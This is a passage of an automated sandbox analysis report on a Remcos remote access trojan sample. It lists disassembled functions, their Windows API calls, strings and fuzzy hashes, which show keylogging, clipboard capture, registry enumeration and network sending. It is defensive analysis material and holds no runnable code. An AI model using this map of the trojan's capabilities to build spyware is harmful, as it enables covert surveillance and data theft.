                                                                                  • Part of subcall function 00446AFF: RtlAllocateHeap.NTDLL(00000000,00434403,?,?,00437227,?,?,?,?,?,0040CC87,00434403,?,?,?,?), ref: 00446B31
                                                                                • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00452D7F
                                                                                • __freea.LIBCMT ref: 00452DAA
                                                                                • __freea.LIBCMT ref: 00452DB6
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ByteCharMultiWide$__alloca_probe_16__freea$AllocateHeapInfo
                                                                                • String ID:
                                                                                • API String ID: 201697637-0
                                                                                • Opcode ID: 9bbe35462230cfd41bb5c244eb617c21ab0dbbd99226abfb5f91c2ba7bf60e7b
                                                                                • Instruction ID: c0da75549b7b47b94c7346473649b17197e9394d7568cc7349c1d05b16f9ad8a
                                                                                • Opcode Fuzzy Hash: 9bbe35462230cfd41bb5c244eb617c21ab0dbbd99226abfb5f91c2ba7bf60e7b
                                                                                • Instruction Fuzzy Hash: F391D872E002169BDF218E64CA51EEF7BB5AF0A315F14055BEC04E7243D7A9DC48CB68
                                                                                Function 007C533C Relevance: 13.7, APIs: 9, Instructions: 153COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: _free
                                                                                • String ID:
                                                                                • API String ID: 269201875-0
                                                                                • Opcode ID: 5328bd0f7edc37ac40c0d0f8fad2384ac8a9632e9013bb03371bda9eca2e0847
                                                                                • Instruction ID: 899da670d840596b7d229093b23d5308c2da1bded6ac250041ec474cb7edb242
                                                                                • Opcode Fuzzy Hash: 5328bd0f7edc37ac40c0d0f8fad2384ac8a9632e9013bb03371bda9eca2e0847
                                                                                • Instruction Fuzzy Hash: D851B131A00685CFCB15DB78D841BEEBBF2FF08304F14016DE895AB252D67AAD85DB50
                                                                                Function 004443F9 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 266COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,0043E260,0043931C,0043E260,?,?,0043B955,FF8BC35D), ref: 00446EC3
                                                                                  • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                                                  • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,FF8BC35D), ref: 00446F37
                                                                                  • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                                                • _memcmp.LIBVCRUNTIME ref: 004446A3
                                                                                • _free.LIBCMT ref: 00444714
                                                                                • _free.LIBCMT ref: 0044472D
                                                                                • _free.LIBCMT ref: 0044475F
                                                                                • _free.LIBCMT ref: 00444768
                                                                                • _free.LIBCMT ref: 00444774
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: _free$ErrorLast$_abort_memcmp
                                                                                • String ID: C
                                                                                • API String ID: 1679612858-1037565863
                                                                                • Opcode ID: 769349a79ca56dd22effc8d38738ceed36357cc24475ad69f0db2214bad425b5
                                                                                • Instruction ID: 3c523a64da6f7cdf058c983f33271b3c05ff2f19a58e511a78fa6d1555c07658
                                                                                • Opcode Fuzzy Hash: 769349a79ca56dd22effc8d38738ceed36357cc24475ad69f0db2214bad425b5
                                                                                • Instruction Fuzzy Hash: 19B13975A012199FEB24DF18C885BAEB7B4FB49304F1485AEE909A7350D739AE90CF44
                                                                                Function 007C4660 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 266COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 007C7126: GetLastError.KERNEL32(?,007BE4C7,007B9583,007BE4C7,00475B70,?,007BBBBC,FF8BC35D,00475B70,00473EE8), ref: 007C712A
                                                                                  • Part of subcall function 007C7126: _free.LIBCMT ref: 007C715D
                                                                                  • Part of subcall function 007C7126: SetLastError.KERNEL32(00000000,FF8BC35D,00475B70,00473EE8), ref: 007C719E
                                                                                  • Part of subcall function 007C7126: _abort.LIBCMT ref: 007C71A4
                                                                                • _memcmp.LIBVCRUNTIME ref: 007C490A
                                                                                • _free.LIBCMT ref: 007C497B
                                                                                • _free.LIBCMT ref: 007C4994
                                                                                • _free.LIBCMT ref: 007C49C6
                                                                                • _free.LIBCMT ref: 007C49CF
                                                                                • _free.LIBCMT ref: 007C49DB
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: _free$ErrorLast$_abort_memcmp
                                                                                • String ID: C
                                                                                • API String ID: 1679612858-1037565863
                                                                                • Opcode ID: 073fed261fa285cd6c65459185357f93b396e03b6829dbcf8ce3010cb8f635a5
                                                                                • Instruction ID: c6ca6fedc64b347e1f2931445fa2dd4a623fbd2659294e32506ca6b398be429a
                                                                                • Opcode Fuzzy Hash: 073fed261fa285cd6c65459185357f93b396e03b6829dbcf8ce3010cb8f635a5
                                                                                • Instruction Fuzzy Hash: 88B12875A01229DFDB24DF18C898BAEB7B4FB09304F1045AEE949A7351D735AE90CF40
                                                                                Function 004139C7 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 228COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: tcp$udp
                                                                                • API String ID: 0-3725065008
                                                                                • Opcode ID: feee9516c16efef68815b89ade9cbffe5bf55ce5106af849680fee818ce7e4b0
                                                                                • Instruction ID: e59cad8d3053530f07be13ad944632c35d9115139dfdf9e987abb4c2b311e0ee
                                                                                • Opcode Fuzzy Hash: feee9516c16efef68815b89ade9cbffe5bf55ce5106af849680fee818ce7e4b0
                                                                                • Instruction Fuzzy Hash: 9171AB316083128FDB24CE5584847ABB6E4AF84746F10043FF885A7352E778DE85CB9A
                                                                                Function 004559CA Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 152COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: _free
                                                                                • String ID: gKE$HE$HE
                                                                                • API String ID: 269201875-2777690135
                                                                                • Opcode ID: 65ff1149e5400faf749e77ee0a373f8307c7a4f77e118ae33a4d82d27c9b20c0
                                                                                • Instruction ID: 4134de32792d44acead4bb36f8da9b5b282593f8ffe10db144b1eaf4d9577b64
                                                                                • Opcode Fuzzy Hash: 65ff1149e5400faf749e77ee0a373f8307c7a4f77e118ae33a4d82d27c9b20c0
                                                                                • Instruction Fuzzy Hash: 90412A31A009106BEF24AABA8CD5A7F3B64DF45375F14031BFC1896293D67C8C4996AA
                                                                                Function 007819CF Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 142threadCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • __Init_thread_footer.LIBCMT ref: 00781A23
                                                                                  • Part of subcall function 007B3736: RtlEnterCriticalSection.NTDLL(00470D18), ref: 007B3740
                                                                                  • Part of subcall function 007B3736: RtlLeaveCriticalSection.NTDLL(00470D18), ref: 007B3773
                                                                                • RtlExitUserThread.NTDLL(00000000), ref: 00781A5B
                                                                                • waveInUnprepareHeader.WINMM(00001E64,00000020,00000000,?,00000020,00473EE8,00000000), ref: 00781B69
                                                                                  • Part of subcall function 007B3780: RtlEnterCriticalSection.NTDLL(00470D18), ref: 007B378B
                                                                                  • Part of subcall function 007B3780: RtlLeaveCriticalSection.NTDLL(00470D18), ref: 007B37C8
                                                                                  • Part of subcall function 007B3B0C: __onexit.LIBCMT ref: 007B3B12
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CriticalSection$EnterLeave$ExitHeaderInit_thread_footerThreadUnprepareUser__onexitwave
                                                                                • String ID: `i$p[G$>G$>G
                                                                                • API String ID: 2307665288-3362937785
                                                                                • Opcode ID: 8f70ea2b40fb44211d0b69bbfe51e678a1d722ca5741e51af6e8456a38407156
                                                                                • Instruction ID: fee61b2da785b8bb42d40cfd7c13adafa38728f5ff7e0e47b8ec053a9b255d47
                                                                                • Opcode Fuzzy Hash: 8f70ea2b40fb44211d0b69bbfe51e678a1d722ca5741e51af6e8456a38407156
                                                                                • Instruction Fuzzy Hash: 1D41C631684200DBC329FB28DD5EEAE7399EB80311F50452EF519961E2EF78AD47C716
                                                                                Function 00792EEF Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 135registryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • RegOpenKeyExW.ADVAPI32(00000000,00000000,00000000,00020019,?), ref: 00792F28
                                                                                  • Part of subcall function 00792C11: RegQueryInfoKeyW.ADVAPI32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00792C84
                                                                                  • Part of subcall function 00792C11: RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?,?,00000000,?,?,?,?), ref: 00792CB3
                                                                                  • Part of subcall function 007846CF: send.WS2_32(?,00000000,00000000,00000000), ref: 00784764
                                                                                • RegCloseKey.ADVAPI32(TUFTUF,00465554,00465554,00465900,00465900,00000071), ref: 00793098
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CloseEnumInfoOpenQuerysend
                                                                                • String ID: TUF$TUFTUF$>G$DG$DG
                                                                                • API String ID: 3114080316-72097156
                                                                                • Opcode ID: 09c09115532b36cedb4214abfd7c567596c85741be2dd330b3884bc25d138105
                                                                                • Instruction ID: 442b2fa5651a4b7c7f9784fa7113ad489476212af0726a7b458307d5544a885e
                                                                                • Opcode Fuzzy Hash: 09c09115532b36cedb4214abfd7c567596c85741be2dd330b3884bc25d138105
                                                                                • Instruction Fuzzy Hash: FD41C831688204DBC328F728E85EAEF73959F91311F50842EF54A97293EF2C5D0A8766
                                                                                Function 00789D77 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 108keyboardthreadCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetForegroundWindow.USER32 ref: 00789DA6
                                                                                • GetWindowThreadProcessId.USER32(00000000,?), ref: 00789DB2
                                                                                • GetKeyboardLayout.USER32(00000000), ref: 00789DB9
                                                                                • GetKeyState.USER32(00000010), ref: 00789DC3
                                                                                • GetKeyboardState.USER32(?), ref: 00789DCE
                                                                                • ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 00789E83
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: KeyboardStateWindow$ForegroundLayoutProcessThreadUnicode
                                                                                • String ID: 8[G
                                                                                • API String ID: 3566172867-1691237782
                                                                                • Opcode ID: 0057a6b8e9be89c2a124ace2c7aa15ce6e2280d77a8450e2501583d43799386c
                                                                                • Instruction ID: 31cb3b930b9d7fd365adf38117c3c31e9bbc2bc4b7ea5d7d394731621fcf5ad4
                                                                                • Opcode Fuzzy Hash: 0057a6b8e9be89c2a124ace2c7aa15ce6e2280d77a8450e2501583d43799386c
                                                                                • Instruction Fuzzy Hash: 5F318172544308AFD710DF90DC85FEB7BECEB48711F00083ABA45961A1D7B5E548DBA2
                                                                                Function 00406BE9 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 97fileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00465454,?,?,00000000,00407273,00000000,?,0000000A,00000000), ref: 00406C38
                                                                                • WriteFile.KERNEL32(00000000,?,00000000,?,00000000,?,000186A0,?,?,?,00000000,00407273,00000000,?,0000000A,00000000), ref: 00406C80
                                                                                  • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                                • CloseHandle.KERNEL32(00000000,?,?,00000000,00407273,00000000,?,0000000A,00000000,00000000), ref: 00406CC0
                                                                                • MoveFileW.KERNEL32(00000000,00000000), ref: 00406CDD
                                                                                • CloseHandle.KERNEL32(00000000,00000057,?,00000008,?,?,?,?,?,?,0000000A,00000000,00000000), ref: 00406D08
                                                                                • DeleteFileW.KERNEL32(00000000,?,?,?,?,?,?,0000000A,00000000,00000000), ref: 00406D18
                                                                                  • Part of subcall function 0040455B: WaitForSingleObject.KERNEL32(?,000000FF,?,?,0040460E,00000000,?,?), ref: 0040456A
                                                                                  • Part of subcall function 0040455B: SetEvent.KERNEL32(?,?,?,0040460E,00000000,?,?), ref: 00404588
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: File$CloseHandle$CreateDeleteEventMoveObjectSingleWaitWritesend
                                                                                • String ID: .part
                                                                                • API String ID: 1303771098-3499674018
                                                                                • Opcode ID: 5cb996c1ffb03084886c4e4072c3f1b63d42d5bcae1fa9276731ece7fbb20224
                                                                                • Instruction ID: a9f2b94bfe891e644ef5b97f564769cd4b441703f4f7d546a0b6aea2ef9939f1
                                                                                • Opcode Fuzzy Hash: 5cb996c1ffb03084886c4e4072c3f1b63d42d5bcae1fa9276731ece7fbb20224
                                                                                • Instruction Fuzzy Hash: 1C31C2715083019FD210EF21DD459AFB7A8FB85715F40093FF9C6A21A1DB38AA48CB9A
                                                                                Function 0041A81D Relevance: 12.3, APIs: 1, Strings: 6, Instructions: 90COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 00412584: RegOpenKeyExW.ADVAPI32(80000001,00000400,00000000,00020019,?), ref: 004125A6
                                                                                  • Part of subcall function 00412584: RegQueryValueExW.ADVAPI32(?,0040E0BA,00000000,00000000,?,00000400), ref: 004125C5
                                                                                  • Part of subcall function 00412584: RegCloseKey.ADVAPI32(?), ref: 004125CE
                                                                                  • Part of subcall function 0041B15B: GetCurrentProcess.KERNEL32(?,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B16C
                                                                                  • Part of subcall function 0041B15B: IsWow64Process.KERNEL32(00000000,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B173
                                                                                • _wcslen.LIBCMT ref: 0041A8F6
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Process$CloseCurrentOpenQueryValueWow64_wcslen
                                                                                • String ID: .exe$:@$XCG$http\shell\open\command$program files (x86)\$program files\
                                                                                • API String ID: 3286818993-703403762
                                                                                • Opcode ID: a97cffdb293a37a7a45951d73a64a7af970009917e936a30d46fd230753a6829
                                                                                • Instruction ID: cf464564bb47d370653928ac6653466accee15d45f6204cdc17a1bec324f9b19
                                                                                • Opcode Fuzzy Hash: a97cffdb293a37a7a45951d73a64a7af970009917e936a30d46fd230753a6829
                                                                                • Instruction Fuzzy Hash: 3021B8727001043BDB04BAB58C96DEE366D9B85358F14083FF402F72C2ED3C9D5942A9
                                                                                Function 00789C4B Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 65windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 00789C68
                                                                                • SetWindowsHookExA.USER32(0000000D,004099D0,00000000), ref: 00789C76
                                                                                • GetLastError.KERNEL32 ref: 00789C82
                                                                                  • Part of subcall function 0079A8ED: GetLocalTime.KERNEL32(00000000), ref: 0079A907
                                                                                • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 00789CD2
                                                                                • TranslateMessage.USER32(?), ref: 00789CE1
                                                                                • DispatchMessageA.USER32(?), ref: 00789CEC
                                                                                Strings
                                                                                • Keylogger initialization failure: error , xrefs: 00789C99
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Message$DispatchErrorHandleHookLastLocalModuleTimeTranslateWindows
                                                                                • String ID: Keylogger initialization failure: error
                                                                                • API String ID: 3219506041-952744263
                                                                                • Opcode ID: 10065da0f80e2b1588f186909b8751ab17816e81d90ef01b858d99eb9022e310
                                                                                • Instruction ID: 0fd5a7b74a252ddcffe6bfacb8c2fe0f4dd1b1b418cdff25694102288bb37a35
                                                                                • Opcode Fuzzy Hash: 10065da0f80e2b1588f186909b8751ab17816e81d90ef01b858d99eb9022e310
                                                                                • Instruction Fuzzy Hash: 25110131644301AB8310BB7AAC0ED2B77ECEB94B22B10057EFD46C2251FA68D901C7A6
                                                                                Function 0041BEB0 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 47memoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • AllocConsole.KERNEL32(00474358), ref: 0041BEB9
                                                                                • GetConsoleWindow.KERNEL32 ref: 0041BEBF
                                                                                • ShowWindow.USER32(00000000,00000000), ref: 0041BED2
                                                                                • SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041BEF7
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Console$Window$AllocOutputShow
                                                                                • String ID: Remcos v$5.3.0 Pro$CONOUT$
                                                                                • API String ID: 4067487056-2527699604
                                                                                • Opcode ID: 665a097808b038229c9a37eafed355beb7ea993dcaa7ec452e19bba1328996a1
                                                                                • Instruction ID: 482f1cdaf256b8236abc94a0b12de3dc55517b66349f776fa4240982defd8f75
                                                                                • Opcode Fuzzy Hash: 665a097808b038229c9a37eafed355beb7ea993dcaa7ec452e19bba1328996a1
                                                                                • Instruction Fuzzy Hash: 180171B19803047BD600FBF29D4BFDD37AC9B14705F5004277644E7093EABCA554866D
                                                                                Function 00449950 Relevance: 12.2, APIs: 8, Instructions: 216COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,0043D564,0043D564,?,?,?,00449BA1,00000001,00000001,1AE85006), ref: 004499AA
                                                                                • __alloca_probe_16.LIBCMT ref: 004499E2
                                                                                • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00449BA1,00000001,00000001,1AE85006,?,?,?), ref: 00449A30
                                                                                • __alloca_probe_16.LIBCMT ref: 00449AC7
                                                                                • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,1AE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00449B2A
                                                                                • __freea.LIBCMT ref: 00449B37
                                                                                  • Part of subcall function 00446AFF: RtlAllocateHeap.NTDLL(00000000,00434403,?,?,00437227,?,?,?,?,?,0040CC87,00434403,?,?,?,?), ref: 00446B31
                                                                                • __freea.LIBCMT ref: 00449B40
                                                                                • __freea.LIBCMT ref: 00449B65
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                                                                                • String ID:
                                                                                • API String ID: 3864826663-0
                                                                                • Opcode ID: 4f32ff11c9a2c5bbe2f4738f39354e42457cdb7b2d04467834f9366f6cd65cf7
                                                                                • Instruction ID: d3450b84a68f20df6837e20b70452335b33749c243a385fd48b45426a0ff81fe
                                                                                • Opcode Fuzzy Hash: 4f32ff11c9a2c5bbe2f4738f39354e42457cdb7b2d04467834f9366f6cd65cf7
                                                                                • Instruction Fuzzy Hash: 89511572610246AFFB258F65DC81EBB77A9EB44754F15462EFC04E6240EF38EC40E668
                                                                                Function 00418ABE Relevance: 12.1, APIs: 8, Instructions: 117keyboardCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • SendInput.USER32 ref: 00418B08
                                                                                • SendInput.USER32(00000001,?,0000001C), ref: 00418B30
                                                                                • SendInput.USER32(00000001,0000001C,0000001C), ref: 00418B57
                                                                                • SendInput.USER32(00000001,0000001C,0000001C), ref: 00418B75
                                                                                • SendInput.USER32(00000001,0000001C,0000001C), ref: 00418B95
                                                                                • SendInput.USER32(00000001,0000001C,0000001C), ref: 00418BBA
                                                                                • SendInput.USER32(00000001,0000001C,0000001C), ref: 00418BDC
                                                                                • SendInput.USER32(00000001,?,0000001C), ref: 00418BFF
                                                                                  • Part of subcall function 00418AB1: MapVirtualKeyA.USER32(00000000,00000000), ref: 00418AB7
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: InputSend$Virtual
                                                                                • String ID:
                                                                                • API String ID: 1167301434-0
                                                                                • Opcode ID: 88f93acc81d4616b4190e12117d1b14dafb1e9928c91053c24dee7c09840eeb6
                                                                                • Instruction ID: ee8b26819532887277ba411a2a2a0296f2420856d0f10470abe43a11d9a37015
                                                                                • Opcode Fuzzy Hash: 88f93acc81d4616b4190e12117d1b14dafb1e9928c91053c24dee7c09840eeb6
                                                                                • Instruction Fuzzy Hash: 3231A471248345AAE210DF65D841FDFFBECAFC5B44F04080FB98457291DAA4D98C87AB
                                                                                Function 00415A45 Relevance: 12.0, APIs: 8, Instructions: 46clipboardCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • OpenClipboard.USER32 ref: 00415A46
                                                                                • EmptyClipboard.USER32 ref: 00415A54
                                                                                • CloseClipboard.USER32 ref: 00415A5A
                                                                                • OpenClipboard.USER32 ref: 00415A61
                                                                                • GetClipboardData.USER32(0000000D), ref: 00415A71
                                                                                • GlobalLock.KERNEL32(00000000), ref: 00415A7A
                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 00415A83
                                                                                • CloseClipboard.USER32 ref: 00415A89
                                                                                  • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Clipboard$CloseGlobalOpen$DataEmptyLockUnlocksend
                                                                                • String ID:
                                                                                • API String ID: 2172192267-0
                                                                                • Opcode ID: c97dc0dc99a857ad5ebdb65bb4734d8e7e83005d9fb9f9527a25c03f25fe101b
                                                                                • Instruction ID: 9b100a12d13cc6c4196ee8fc3e520842cce62831b2d72284ea91ff5550736cd9
                                                                                • Opcode Fuzzy Hash: c97dc0dc99a857ad5ebdb65bb4734d8e7e83005d9fb9f9527a25c03f25fe101b
                                                                                • Instruction Fuzzy Hash: A10152312083009FC314BB75EC5AAEE77A5AFC0762F41457EFD06861A2DF38C845D65A
                                                                                Function 007D2D91 Relevance: 10.8, APIs: 7, Instructions: 268COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetCPInfo.KERNEL32(?,?), ref: 007D2E3D
                                                                                • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 007D2EC0
                                                                                • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 007D2F53
                                                                                • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 007D2F6A
                                                                                  • Part of subcall function 007C6D66: RtlAllocateHeap.NTDLL(00000000,007B468A,?), ref: 007C6D98
                                                                                • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 007D2FE6
                                                                                • __freea.LIBCMT ref: 007D3011
                                                                                • __freea.LIBCMT ref: 007D301D
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
